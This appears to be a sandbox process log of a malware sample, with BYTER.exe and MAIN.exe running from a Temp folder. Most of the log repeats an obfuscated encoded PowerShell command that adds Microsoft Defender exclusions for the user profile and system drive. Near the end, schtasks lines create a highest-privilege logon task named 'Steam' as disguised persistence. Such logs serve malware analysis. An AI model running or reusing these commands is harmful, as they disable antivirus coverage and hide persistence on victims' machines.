"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-974993620-1938430478-38908114-385171956-1942359032166037379948395595-2097600350"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1366695945-1939044485-405268087542048551567893023-120042430913678080031225512765"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CB9.tmp.bat""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20005721183767610092050384264-3432325021216569752-1480255568-1031908428-645852718"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Roaming\Steam.exe
"C:\Users\Admin\AppData\Roaming\Steam.exe"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
